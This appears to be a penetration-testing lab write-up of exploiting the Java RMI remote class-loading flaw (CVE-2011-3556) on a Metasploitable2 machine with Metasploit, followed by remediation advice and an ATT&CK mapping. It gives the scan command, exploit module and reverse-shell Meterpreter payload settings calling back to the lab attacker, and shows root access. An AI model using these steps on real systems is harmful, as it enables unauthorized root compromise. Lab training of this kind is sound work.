Exploit for CVE-2011-3556

Name: Exploit for CVE-2011-3556
Rating: 5 (258 reviews)
2026-04-03 | CVSS 7.5
## https://sploitus.com/exploit?id=65908ED3-9DA0-5A00-8811-695FF78742C7
# Vulnerability Assessment: Java RMI Server Remote Code Execution (CVE-2011-3556)

![Severity: Critical](https://img.shields.io/badge/Severity-Critical-red.svg)
![CVSS: 10.0](https://img.shields.io/badge/CVSS-10.0-darkred.svg)
![Target: Metasploitable2](https://img.shields.io/badge/Target-Metasploitable2-blue.svg)
![Tool: Metasploit](https://img.shields.io/badge/Tool-Metasploit-green.svg)

## 📝 Executive Summary

This repository documents the exploitation of a **Java Remote Method Invocation (RMI)** registry service on **Metasploitable2**. The vulnerability arises from an insecure default configuration that allows remote class loading from arbitrary URLs. By delivering a serialized malicious payload, an unauthenticated attacker can achieve **Remote Code Execution (RCE)**.

In this assessment, the Java RMI service was found running with **root privileges**, allowing for a complete system compromise without any prior authentication or user interaction.

---

## 🛠️ Engagement Overview

| Component | Details |
| :--- | :--- |
| **Attacker Machine** | Kali Linux (192.168.56.1) |
| **Target Machine** | Metasploitable2 (192.168.56.102) |
| **Vulnerability** | CVE-2011-3556 (Java RMI Insecure Default) |
| **Exploit Tool** | Metasploit Framework (MSF) |
| **Payload** | `java/meterpreter/reverse_tcp` |
| **Access Level** | **Root (UID 0)** |

---

## 🔍 Vulnerability Analysis

### CVE-2011-3556
The Oracle Java SE RMI component allows the `java.rmi.server.codebase` property to be used for remote class loading. If a Security Manager is not properly configured, the RMI registry will fetch and instantiate classes from a URL provided by the client.

> **Impact:** An attacker can point the RMI registry to a malicious codebase containing a reverse shell or other arbitrary code. Since the service on Metasploitable2 runs as `root`, the attacker gains full administrative control over the target.

---

## 🚀 Attack Lifecycle

### 1. Reconnaissance & Enumeration
The target was identified using `netdiscover`, followed by an `nmap` version scan to pinpoint the RMI registry.

```bash
# Nmap scan identifying the Java RMI registry
nmap -sV -p 1099 192.168.56.102
```
*Findings: Port 1099/TCP was confirmed to be running GNU Classpath grmiregistry, which is vulnerable to unauthenticated RCE.*

### 2. Exploitation
The Metasploit module `exploit/multi/misc/java_rmi_server` was used to exploit the insecure class-loading mechanism.

**Configuration:**
- **Module:** `exploit/multi/misc/java_rmi_server`
- **RHOSTS:** `192.168.56.102`
- **LHOST:** `192.168.56.1`
- **Payload:** `java/meterpreter/reverse_tcp`

### 3. Post-Exploitation
The exploit successfully triggered the remote class load, establishing a **Meterpreter** session. A shell was then spawned and upgraded to a TTY.

```bash
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
```
*Result: Immediate root access confirmed.*

---

## 🛡️ Remediation & Recommendations

| Strategy | Action Item |
| :--- | :--- |
| **Patching** | Upgrade to JDK/JRE 8u121+ where remote class loading is disabled by default. |
| **Hardening** | Implement a restrictive Java Security Manager policy to prevent unauthorized class instantiation. |
| **Network** | Block port 1099/TCP at the network perimeter and host-based firewalls. |
| **Decommission** | Disable or remove the Java RMI service if it is not required for business operations. |
| **Segmentation** | Isolate RMI services within dedicated management VLANs with strict access controls. |

---

## 📊 MITRE ATT&CK® Mapping

| Tactic | Technique | ID |
| :--- | :--- | :--- |
| **Reconnaissance** | Network Service Discovery | [T1046](https://attack.mitre.org/techniques/T1046/) |
| **Initial Access** | Exploit Public-Facing Application | [T1190](https://attack.mitre.org/techniques/T1190/) |
| **Execution** | Command and Scripting Interpreter | [T1059.004](https://attack.mitre.org/techniques/T1059/004/) |
| **Command & Control** | Non-Standard Port | [T1571](https://attack.mitre.org/techniques/T1571/) |

---

## 🔗 References

- [NVD - CVE-2011-3556](https://nvd.nist.gov/vuln/detail/CVE-2011-3556)
- [Rapid7 Exploit Database: Java RMI Server](https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server/)
- [Oracle Java RMI Security Guidelines](https://docs.oracle.com/javase/8/docs/technotes/guides/rmi/)

---
*Disclaimer: This report is for educational and authorized penetration testing purposes only. Unauthorized access to computer systems is illegal.*